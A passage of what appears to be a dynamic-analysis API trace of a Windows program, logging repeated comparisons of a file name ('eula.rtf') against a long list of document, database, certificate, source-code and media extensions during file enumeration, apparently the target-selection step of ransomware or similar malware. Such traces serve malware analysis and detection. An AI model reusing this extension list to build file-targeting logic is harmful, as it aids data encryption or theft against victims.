[0168.824] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0168.824] lstrlenW (lpString=".asc") returned 4 [0168.824] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0168.824] lstrlenW (lpString=".ascx") returned 5 [0168.824] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0168.824] lstrlenW (lpString=".asm") returned 4 [0168.824] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0168.824] lstrlenW (lpString=".asmx") returned 5 [0168.824] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0168.824] lstrlenW (lpString=".asp") returned 4 [0168.824] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0168.824] lstrlenW (lpString=".aspx") returned 5 [0168.824] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0168.827] lstrlenW (lpString=".asr") returned 4 [0168.827] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".asx") returned 4 [0168.828] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".avi") returned 4 [0168.828] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".avs") returned 4 [0168.828] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".backup") returned 7 [0168.828] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0168.828] lstrlenW (lpString=".bak") returned 4 [0168.828] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".bay") returned 4 [0168.828] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".bd") returned 3 [0168.828] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0168.828] lstrlenW (lpString=".bin") returned 4 [0168.828] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".bmp") returned 4 [0168.828] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".bz2") returned 4 [0168.828] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".c") returned 2 [0168.828] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0168.828] lstrlenW (lpString=".cdr") returned 4 [0168.828] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".cer") returned 4 [0168.828] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0168.828] lstrlenW (lpString=".cf") returned 3 [0168.828] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0168.829] lstrlenW (lpString=".cfc") returned 4 [0168.829] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".cfm") returned 4 [0168.829] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".cfml") returned 5 [0168.829] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0168.829] lstrlenW (lpString=".cfu") returned 4 [0168.829] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".chm") returned 4 [0168.829] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".cin") returned 4 [0168.829] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".class") returned 6 [0168.829] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0168.829] lstrlenW (lpString=".clx") returned 4 [0168.829] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".config") returned 7 [0168.829] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0168.829] lstrlenW (lpString=".cpp") returned 4 [0168.829] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".cr2") returned 4 [0168.829] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".crt") returned 4 [0168.829] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0168.829] lstrlenW (lpString=".crw") returned 4 [0168.830] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".cs") returned 3 [0168.830] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0168.830] lstrlenW (lpString=".css") returned 4 [0168.830] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".csv") returned 4 [0168.830] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".cub") returned 4 [0168.830] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".dae") returned 4 [0168.830] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".dat") returned 4 [0168.830] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".db") returned 3 [0168.830] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0168.830] lstrlenW (lpString=".dbf") returned 4 [0168.830] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".dbx") returned 4 [0168.830] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".dc3") returned 4 [0168.830] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".dcm") returned 4 [0168.830] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0168.830] lstrlenW (lpString=".dcr") returned 4 [0168.831] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".der") returned 4 [0168.831] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".dib") returned 4 [0168.831] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".dic") returned 4 [0168.831] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".dif") returned 4 [0168.831] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".divx") returned 5 [0168.831] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0168.831] lstrlenW (lpString=".djvu") returned 5 [0168.831] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0168.831] lstrlenW (lpString=".dng") returned 4 [0168.831] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".doc") returned 4 [0168.831] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".docm") returned 5 [0168.831] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0168.831] lstrlenW (lpString=".docx") returned 5 [0168.831] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.831] lstrlenW (lpString=".dot") returned 4 [0168.831] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".dotm") returned 5 [0168.831] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0168.831] lstrlenW (lpString=".dotx") returned 5 [0168.831] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0168.831] lstrlenW (lpString=".dpx") returned 4 [0168.831] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0168.831] lstrlenW (lpString=".dqy") returned 4 [0168.831] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".dsn") returned 4 [0168.832] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".dt") returned 3 [0168.832] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0168.832] lstrlenW (lpString=".dtd") returned 4 [0168.832] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".dwg") returned 4 [0168.832] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".dwt") returned 4 [0168.832] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".dx") returned 3 [0168.832] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0168.832] lstrlenW (lpString=".dxf") returned 4 [0168.832] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".edml") returned 5 [0168.832] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0168.832] lstrlenW (lpString=".efd") returned 4 [0168.832] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".elf") returned 4 [0168.832] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".emf") returned 4 [0168.832] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".emz") returned 4 [0168.832] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".epf") returned 4 [0168.832] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".eps") returned 4 [0168.832] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".epsf") returned 5 [0168.832] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0168.832] lstrlenW (lpString=".epsp") returned 5 [0168.832] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0168.832] lstrlenW (lpString=".erf") returned 4 [0168.832] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0168.832] lstrlenW (lpString=".exr") returned 4 [0168.833] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".f4v") returned 4 [0168.833] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".fido") returned 5 [0168.833] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0168.833] lstrlenW (lpString=".flm") returned 4 [0168.833] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".flv") returned 4 [0168.833] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".frm") returned 4 [0168.833] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".fxg") returned 4 [0168.833] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".geo") returned 4 [0168.833] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".gif") returned 4 [0168.833] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".grs") returned 4 [0168.833] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".gz") returned 3 [0168.833] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0168.833] lstrlenW (lpString=".h") returned 2 [0168.833] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0168.833] lstrlenW (lpString=".hdr") returned 4 [0168.833] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".hpp") returned 4 [0168.833] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".hta") returned 4 [0168.833] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".htc") returned 4 [0168.833] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".htm") returned 4 [0168.833] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0168.833] lstrlenW (lpString=".html") returned 5 [0168.833] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0168.833] lstrlenW (lpString=".icb") returned 4 [0168.834] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".ics") returned 4 [0168.834] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".iff") returned 4 [0168.834] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".inc") returned 4 [0168.834] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".indd") returned 5 [0168.834] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0168.834] lstrlenW (lpString=".ini") returned 4 [0168.834] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".iqy") returned 4 [0168.834] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".j2c") returned 4 [0168.834] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".j2k") returned 4 [0168.834] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".java") returned 5 [0168.834] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0168.834] lstrlenW (lpString=".jp2") returned 4 [0168.834] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".jpc") returned 4 [0168.834] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".jpe") returned 4 [0168.834] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".jpeg") returned 5 [0168.834] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0168.834] lstrlenW (lpString=".jpf") returned 4 [0168.834] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".jpg") returned 4 [0168.834] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".jpx") returned 4 [0168.834] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0168.834] lstrlenW (lpString=".js") returned 3 [0168.834] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0168.835] lstrlenW (lpString=".jsf") returned 4 [0168.835] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".json") returned 5 [0168.835] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0168.835] lstrlenW (lpString=".jsp") returned 4 [0168.835] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".kdc") returned 4 [0168.835] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".kmz") returned 4 [0168.835] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".kwm") returned 4 [0168.835] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".lasso") returned 6 [0168.835] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0168.835] lstrlenW (lpString=".lbi") returned 4 [0168.835] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".lgf") returned 4 [0168.835] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".lgp") returned 4 [0168.835] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".log") returned 4 [0168.835] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".m1v") returned 4 [0168.835] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".m4a") returned 4 [0168.835] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".m4v") returned 4 [0168.835] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".max") returned 4 [0168.835] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".md") returned 3 [0168.835] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0168.835] lstrlenW (lpString=".mda") returned 4 [0168.835] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0168.835] lstrlenW (lpString=".mdb") returned 4 [0168.835] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mde") returned 4 [0168.836] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mdf") returned 4 [0168.836] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mdw") returned 4 [0168.836] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mef") returned 4 [0168.836] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mft") returned 4 [0168.836] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mfw") returned 4 [0168.836] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mht") returned 4 [0168.836] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mhtml") returned 6 [0168.836] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0168.836] lstrlenW (lpString=".mka") returned 4 [0168.836] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mkidx") returned 6 [0168.836] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0168.836] lstrlenW (lpString=".mkv") returned 4 [0168.836] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mos") returned 4 [0168.836] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mov") returned 4 [0168.836] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mp3") returned 4 [0168.836] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mp4") returned 4 [0168.836] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0168.836] lstrlenW (lpString=".mpeg") returned 5 [0168.836] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0168.836] lstrlenW (lpString=".mpg") returned 4 [0168.837] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".mpv") returned 4 [0168.837] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".mrw") returned 4 [0168.837] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".msg") returned 4 [0168.837] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".mxl") returned 4 [0168.837] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".myd") returned 4 [0168.837] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".myi") returned 4 [0168.837] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".nef") returned 4 [0168.837] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".nrw") returned 4 [0168.837] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".obj") returned 4 [0168.837] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".odb") returned 4 [0168.837] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".odc") returned 4 [0168.837] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".odm") returned 4 [0168.837] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".odp") returned 4 [0168.837] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".ods") returned 4 [0168.837] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0168.837] lstrlenW (lpString=".oft") returned 4 [0168.837] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".one") returned 4 [0168.838] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".onepkg") returned 7 [0168.838] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0168.838] lstrlenW (lpString=".onetoc2") returned 8 [0168.838] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0168.838] lstrlenW (lpString=".opt") returned 4 [0168.838] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".oqy") returned 4 [0168.838] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".orf") returned 4 [0168.838] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".p12") returned 4 [0168.838] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".p7b") returned 4 [0168.838] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".p7c") returned 4 [0168.838] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".pam") returned 4 [0168.838] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".pbm") returned 4 [0168.838] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".pct") returned 4 [0168.838] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".pcx") returned 4 [0168.838] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0168.838] lstrlenW (lpString=".pdd") returned 4 [0168.838] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pdf") returned 4 [0168.839] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pdp") returned 4 [0168.839] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pef") returned 4 [0168.839] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pem") returned 4 [0168.839] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pff") returned 4 [0168.839] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pfm") returned 4 [0168.839] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pfx") returned 4 [0168.839] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".pgm") returned 4 [0168.839] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".php") returned 4 [0168.839] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0168.839] lstrlenW (lpString=".php3") returned 5 [0168.839] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0168.839] lstrlenW (lpString=".php4") returned 5 [0168.839] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0168.839] lstrlenW (lpString=".php5") returned 5 [0168.839] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0168.839] lstrlenW (lpString=".phtml") returned 6 [0168.839] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0168.839] lstrlenW (lpString=".pict") returned 5 [0168.839] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0168.839] lstrlenW (lpString=".pl") returned 3 [0168.839] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0168.840] lstrlenW (lpString=".pls") returned 4 [0168.840] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".pm") returned 3 [0168.840] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0168.840] lstrlenW (lpString=".png") returned 4 [0168.840] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".pnm") returned 4 [0168.840] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".pot") returned 4 [0168.840] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".potm") returned 5 [0168.840] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0168.840] lstrlenW (lpString=".potx") returned 5 [0168.840] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0168.840] lstrlenW (lpString=".ppa") returned 4 [0168.840] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".ppam") returned 5 [0168.840] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0168.840] lstrlenW (lpString=".ppm") returned 4 [0168.840] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".pps") returned 4 [0168.840] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".ppsm") returned 5 [0168.840] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0168.840] lstrlenW (lpString=".ppt") returned 4 [0168.840] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.840] lstrlenW (lpString=".pptm") returned 5 [0168.840] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0168.840] lstrlenW (lpString=".pptx") returned 5 [0168.841] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0168.841] lstrlenW (lpString=".prn") returned 4 [0168.841] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".ps") returned 3 [0168.841] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0168.841] lstrlenW (lpString=".psb") returned 4 [0168.841] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".psd") returned 4 [0168.841] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".pst") returned 4 [0168.841] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".ptx") returned 4 [0168.841] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".pub") returned 4 [0168.841] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".pwm") returned 4 [0168.841] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".pxr") returned 4 [0168.841] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".py") returned 3 [0168.841] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0168.841] lstrlenW (lpString=".qt") returned 3 [0168.841] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0168.841] lstrlenW (lpString=".r3d") returned 4 [0168.841] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".raf") returned 4 [0168.841] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0168.841] lstrlenW (lpString=".rar") returned 4 [0168.841] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.841] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 